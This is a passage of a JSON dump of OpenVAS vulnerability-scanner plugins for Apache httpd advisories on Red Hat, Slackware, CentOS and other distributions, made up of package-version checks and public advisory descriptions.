ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2012:0128-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310870631", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870631", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0128-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00029.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870631\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:37:07 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"RHSA\", value:\"2012:0128-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0128-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n '.htaccess' file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the 'apache' user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. 
After installing the updated\n packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:05", "description": "The remote host is missing an update as announced\nvia advisory SSA:2012-041-01.", "cvss3": {}, "published": "2012-09-10T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2012-041-01 httpd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:136141256231071965", "href": 
"http://plugins.openvas.org/nasl.php?oid=136141256231071965", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2012_041_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from advisory SSA:2012-041-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71965\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"$Revision: 14202 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:18 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2012-041-01 httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(12\\.0|12\\.1|12\\.2|13\\.0|13\\.1|13\\.37)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2012-041-01\");\n\n script_tag(name:\"insight\", value:\"New httpd packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\n13.37, and -current to fix security issues. The apr-util package has also been\nupdated to the latest version.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2012-041-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.0\", rls:\"SLK13.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", 
ver:\"2.2.22-i486-1_slack13.0\", rls:\"SLK13.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.1\", rls:\"SLK13.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.1\", rls:\"SLK13.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.37\", rls:\"SLK13.37\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.37\", rls:\"SLK13.37\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-06T13:06:47", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2012:0128-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:870631", "href": "http://plugins.openvas.org/nasl.php?oid=870631", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0128-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n '.htaccess' file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the 'apache' user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. 
After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00029.html\");\n script_id(870631);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:37:07 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2012:0128-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0128-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6_2.1\", 
rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:45", "description": "The remote host is missing an update as announced\nvia advisory SSA:2012-041-01.", "cvss3": {}, "published": "2012-09-10T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2012-041-01 httpd ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:71965", "href": "http://plugins.openvas.org/nasl.php?oid=71965", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2012_041_01.nasl 6581 2017-07-06 13:58:51Z cfischer $\n# Description: Auto-generated from advisory SSA:2012-041-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New httpd packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\n13.37, and -current to fix security issues. 
The apr-util package has also been\nupdated to the latest version.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2012-041-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2012-041-01\";\n \nif(description)\n{\n script_id(71965);\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"$Revision: 6581 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:58:51 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:18 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2012-041-01 httpd \");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 
1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.37\", rls:\"SLK13.37\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.37\", rls:\"SLK13.37\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:25", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2012:0128 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2017-12-27T00:00:00", "id": "OPENVAS:881089", "href": "http://plugins.openvas.org/nasl.php?oid=881089", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2012:0128 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free 
Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n \n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. 
An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n '.htaccess' file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the 'apache' user.\n (CVE-2011-3607)\n \n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\");\n script_id(881089);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:05:13 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"CESA\", value: \"2012:0128\");\n script_name(\"CentOS Update for httpd CESA-2012:0128 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-11T11:06:24", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2012-1598", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2018-01-09T00:00:00", "id": "OPENVAS:863961", "href": 
"http://plugins.openvas.org/nasl.php?oid=863961", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2012-1598\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"httpd on Fedora 16\";\ntag_insight = \"The Apache HTTP Server is a powerful, efficient, and extensible\n web 